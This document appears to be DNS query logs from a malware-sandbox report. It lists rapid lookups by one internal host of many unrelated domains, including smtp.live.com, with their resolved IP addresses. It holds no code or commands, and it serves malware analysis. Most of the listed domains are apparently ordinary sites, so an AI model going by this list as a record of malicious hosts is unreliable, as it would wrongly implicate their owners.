                                                                                                                                                                              Sep 15, 2023 07:28:23.007152081 CEST8.8.8.8192.168.2.30x2c15Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.017462969 CEST8.8.8.8192.168.2.30xd999No error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.035614014 CEST8.8.8.8192.168.2.30x37d9Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.045528889 CEST8.8.8.8192.168.2.30x44b8Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.053253889 CEST8.8.8.8192.168.2.30x62abName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.056340933 CEST8.8.8.8192.168.2.30x1a14No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.092308044 CEST8.8.8.8192.168.2.30x833dNo error (0)oh28ya.com54.178.105.247A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.092308044 CEST8.8.8.8192.168.2.30x833dNo error (0)oh28ya.com35.75.241.176A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.106623888 CEST8.8.8.8192.168.2.30x36bNo error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.136945009 CEST8.8.8.8192.168.2.30xdc16Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.149274111 CEST8.8.8.8192.168.2.30x8908Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.160655022 CEST8.8.8.8192.168.2.30x1f33No error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.194348097 CEST8.8.8.8192.168.2.30xeb96Server failure (2)www.vazir.senonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.210000992 CEST8.8.8.8192.168.2.30xd319No error (0)koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.221354008 CEST8.8.8.8192.168.2.30xd319No error (0)koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.223573923 CEST8.8.8.8192.168.2.30x4eebNo error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.224991083 CEST8.8.8.8192.168.2.30xef03No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.228095055 CEST8.8.8.8192.168.2.30x6756No error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.234399080 CEST8.8.8.8192.168.2.30xd47bNo error (0)kayoaiba.com47.91.170.222A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.336574078 CEST8.8.8.8192.168.2.30x17d8No error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.352516890 CEST8.8.8.8192.168.2.30xe778No error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.384845018 CEST8.8.8.8192.168.2.30xd76eServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.391799927 CEST8.8.8.8192.168.2.30x3e34No error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.469985008 CEST8.8.8.8192.168.2.30x47d7Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.472414970 CEST8.8.8.8192.168.2.30x22cbNo error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.475706100 CEST8.8.8.8192.168.2.30x5518Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.487627983 CEST8.8.8.8192.168.2.30x1ea0No error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.530016899 CEST8.8.8.8192.168.2.30x4322Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.573807001 CEST8.8.8.8192.168.2.30xe1c6Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.575633049 CEST8.8.8.8192.168.2.30x97fdNo error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.575633049 CEST8.8.8.8192.168.2.30x97fdNo error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.576585054 CEST8.8.8.8192.168.2.30xe191Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.628926039 CEST8.8.8.8192.168.2.30x213aNo error (0)likangds.com156.251.140.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.674535036 CEST8.8.8.8192.168.2.30xb7fName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.679841042 CEST8.8.8.8192.168.2.30x794cName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.709804058 CEST8.8.8.8192.168.2.30x9efNo error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.710757971 CEST8.8.8.8192.168.2.30x8d15No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.710757971 CEST8.8.8.8192.168.2.30x8d15No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.710757971 CEST8.8.8.8192.168.2.30x8d15No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.715038061 CEST8.8.8.8192.168.2.30x749fNo error (0)anduran.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.715038061 CEST8.8.8.8192.168.2.30x749fNo error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.715038061 CEST8.8.8.8192.168.2.30x749fNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.715038061 CEST8.8.8.8192.168.2.30x749fNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.716415882 CEST8.8.8.8192.168.2.30xfa66No error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.744333982 CEST8.8.8.8192.168.2.30x41efNo error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.745871067 CEST8.8.8.8192.168.2.30xa2b0No error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.773312092 CEST8.8.8.8192.168.2.30xb9aaNo error (0)zugseil.com92.42.191.40A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.775106907 CEST8.8.8.8192.168.2.30xc7a0No error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.775106907 CEST8.8.8.8192.168.2.30xc7a0No error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.775106907 CEST8.8.8.8192.168.2.30xc7a0No error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.833668947 CEST8.8.8.8192.168.2.30xe3d4No error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.833668947 CEST8.8.8.8192.168.2.30xe3d4No error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.874347925 CEST8.8.8.8192.168.2.30x9c2bNo error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.874347925 CEST8.8.8.8192.168.2.30x9c2bNo error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.874347925 CEST8.8.8.8192.168.2.30x9c2bNo error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.878351927 CEST8.8.8.8192.168.2.30x3cb9No error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.881081104 CEST8.8.8.8192.168.2.30xbf5cNo error (0)ascc.org.au203.210.102.34A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.882138968 CEST8.8.8.8192.168.2.30x1282No error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.908865929 CEST8.8.8.8192.168.2.30x9f43No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.936352015 CEST8.8.8.8192.168.2.30xf96dNo error (0)mjrcpas.com204.11.56.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.028065920 CEST8.8.8.8192.168.2.30x2c15Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.035096884 CEST8.8.8.8192.168.2.30x2412No error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.035096884 CEST8.8.8.8192.168.2.30x2412No error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.095062971 CEST8.8.8.8192.168.2.30x4649Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.103585958 CEST8.8.8.8192.168.2.30x1239No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.103585958 CEST8.8.8.8192.168.2.30x1239No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.103585958 CEST8.8.8.8192.168.2.30x1239No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.128168106 CEST8.8.8.8192.168.2.30x99afName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.133243084 CEST8.8.8.8192.168.2.30x5e8cNo error (0)shittas.com192.3.246.178A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.155946016 CEST8.8.8.8192.168.2.30x5fceServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.183836937 CEST8.8.8.8192.168.2.30x9130No error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.226300001 CEST8.8.8.8192.168.2.30xe205Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.228770971 CEST8.8.8.8192.168.2.30x7cecServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.238168955 CEST8.8.8.8192.168.2.30xdcffNo error (0)shesfit.com104.21.74.141A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.238168955 CEST8.8.8.8192.168.2.30xdcffNo error (0)shesfit.com172.67.158.251A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.261758089 CEST8.8.8.8192.168.2.30x2eNo error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.261758089 CEST8.8.8.8192.168.2.30x2eNo error (0)d2r2uj0bnofxxz.cloudfront.net13.249.85.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.261758089 CEST8.8.8.8192.168.2.30x2eNo error (0)d2r2uj0bnofxxz.cloudfront.net13.249.85.117A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.261758089 CEST8.8.8.8192.168.2.30x2eNo error (0)d2r2uj0bnofxxz.cloudfront.net13.249.85.28A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.261758089 CEST8.8.8.8192.168.2.30x2eNo error (0)d2r2uj0bnofxxz.cloudfront.net13.249.85.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.289882898 CEST8.8.8.8192.168.2.30x342No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.289882898 CEST8.8.8.8192.168.2.30x342No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.289882898 CEST8.8.8.8192.168.2.30x342No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.289882898 CEST8.8.8.8192.168.2.30x342No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.321952105 CEST8.8.8.8192.168.2.30x7d6bServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.322623014 CEST8.8.8.8192.168.2.30x3860No error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.326826096 CEST8.8.8.8192.168.2.30xae0eNo error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.326841116 CEST8.8.8.8192.168.2.30x67baName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.339787960 CEST8.8.8.8192.168.2.30x4226No error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.339787960 CEST8.8.8.8192.168.2.30x4226No error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.353440046 CEST8.8.8.8192.168.2.30xa108Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.362782955 CEST8.8.8.8192.168.2.30xac52Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.402973890 CEST8.8.8.8192.168.2.30xce0cNo error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.414951086 CEST8.8.8.8192.168.2.30xa2cdNo error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.420504093 CEST8.8.8.8192.168.2.30x165dServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.428930998 CEST8.8.8.8192.168.2.30x9ff8No error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.443229914 CEST8.8.8.8192.168.2.30xc969No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.445244074 CEST8.8.8.8192.168.2.30xff9Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.461653948 CEST8.8.8.8192.168.2.30xb251Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.482677937 CEST8.8.8.8192.168.2.30xbbf2Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.490732908 CEST8.8.8.8192.168.2.30xdd7No error (0)bount.com.tw172.67.196.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.490732908 CEST8.8.8.8192.168.2.30xdd7No error (0)bount.com.tw104.21.76.140A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.561043978 CEST8.8.8.8192.168.2.30xea49Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.572185993 CEST8.8.8.8192.168.2.30xbf5cServer failure (2)ascc.org.aunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.622194052 CEST8.8.8.8192.168.2.30xc9c9Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.687570095 CEST8.8.8.8192.168.2.30xce62No error (0)shiner.com104.21.27.205A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.687570095 CEST8.8.8.8192.168.2.30xce62No error (0)shiner.com172.67.143.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.723655939 CEST8.8.8.8192.168.2.30x86dcNo error (0)websy.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.723655939 CEST8.8.8.8192.168.2.30x86dcNo error (0)websy.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.019227982 CEST8.8.8.8192.168.2.30x73edNo error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.079257011 CEST8.8.8.8192.168.2.30x9feaNo error (0)sanfotek.net216.69.141.67A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.149188042 CEST8.8.8.8192.168.2.30xa9ddName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.155016899 CEST8.8.8.8192.168.2.30xedebNo error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.155016899 CEST8.8.8.8192.168.2.30xedebNo error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.252727032 CEST8.8.8.8192.168.2.30x6fc9Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.346849918 CEST8.8.8.8192.168.2.30xfb0eName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.404716015 CEST8.8.8.8192.168.2.30x3256No error (0)workplus.hu81.0.97.108A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.414896965 CEST8.8.8.8192.168.2.30x165dServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.427067041 CEST8.8.8.8192.168.2.30x436dNo error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.615820885 CEST8.8.8.8192.168.2.30xcd38Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.731759071 CEST8.8.8.8192.168.2.30x59c9No error (0)umcor.am104.21.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.731759071 CEST8.8.8.8192.168.2.30x59c9No error (0)umcor.am172.67.135.11A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.872479916 CEST8.8.8.8192.168.2.30xb42No error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.878555059 CEST8.8.8.8192.168.2.30x8adfNo error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.878688097 CEST8.8.8.8192.168.2.30x39dcNo error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.878688097 CEST8.8.8.8192.168.2.30x39dcNo error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.878688097 CEST8.8.8.8192.168.2.30x39dcNo error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.878688097 CEST8.8.8.8192.168.2.30x39dcNo error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.990235090 CEST8.8.8.8192.168.2.30x2a99No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:26.038352013 CEST8.8.8.8192.168.2.30x2c15Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:26.068855047 CEST8.8.8.8192.168.2.30x2ca9No error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:26.068855047 CEST8.8.8.8192.168.2.30x2ca9No error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:26.068855047 CEST8.8.8.8192.168.2.30x2ca9No error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:26.196023941 CEST8.8.8.8192.168.2.30x8083No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:26.196023941 CEST8.8.8.8192.168.2.30x8083No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:26.196023941 CEST8.8.8.8192.168.2.30x8083No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:26.196023941 CEST8.8.8.8192.168.2.30x8083No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:26.421246052 CEST8.8.8.8192.168.2.30x52b9No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:26.429913998 CEST8.8.8.8192.168.2.30x165dServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:26.578073978 CEST8.8.8.8192.168.2.30x956dNo error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.061863899 CEST8.8.8.8192.168.2.30xff88No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.124897957 CEST8.8.8.8192.168.2.30xc4b0Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.201489925 CEST8.8.8.8192.168.2.30x8419Name error (3)slower.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.203767061 CEST8.8.8.8192.168.2.30xe29No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.207861900 CEST8.8.8.8192.168.2.30x2bc9No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.498965025 CEST8.8.8.8192.168.2.30xa6a3No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.873220921 CEST8.8.8.8192.168.2.30x3049No error (0)bount.com.tw104.21.76.140A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.873220921 CEST8.8.8.8192.168.2.30x3049No error (0)bount.com.tw172.67.196.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.919265985 CEST8.8.8.8192.168.2.30x1cbeNo error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.919265985 CEST8.8.8.8192.168.2.30x1cbeNo error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.015296936 CEST8.8.8.8192.168.2.30xa000No error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.136113882 CEST8.8.8.8192.168.2.30xc4b0Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.233313084 CEST8.8.8.8192.168.2.30x2e39No error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.373049974 CEST8.8.8.8192.168.2.30x71caNo error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.377691984 CEST8.8.8.8192.168.2.30x7e24No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.379389048 CEST8.8.8.8192.168.2.30x749No error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.379389048 CEST8.8.8.8192.168.2.30x749No error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.379389048 CEST8.8.8.8192.168.2.30x749No error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.379389048 CEST8.8.8.8192.168.2.30x749No error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.447145939 CEST8.8.8.8192.168.2.30x165dServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.470424891 CEST8.8.8.8192.168.2.30xfbf4Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.477260113 CEST8.8.8.8192.168.2.30xbd87No error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.477260113 CEST8.8.8.8192.168.2.30xbd87No error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.507445097 CEST8.8.8.8192.168.2.30x7d18No error (0)envogen.com104.21.73.149A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.507445097 CEST8.8.8.8192.168.2.30x7d18No error (0)envogen.com172.67.163.101A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.548048019 CEST8.8.8.8192.168.2.30xe4d1No error (0)dspears.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.548048019 CEST8.8.8.8192.168.2.30xe4d1No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.548048019 CEST8.8.8.8192.168.2.30xe4d1No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.548048019 CEST8.8.8.8192.168.2.30xe4d1No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:29.045948982 CEST8.8.8.8192.168.2.30xc539Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:29.132581949 CEST8.8.8.8192.168.2.30xc4b0Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
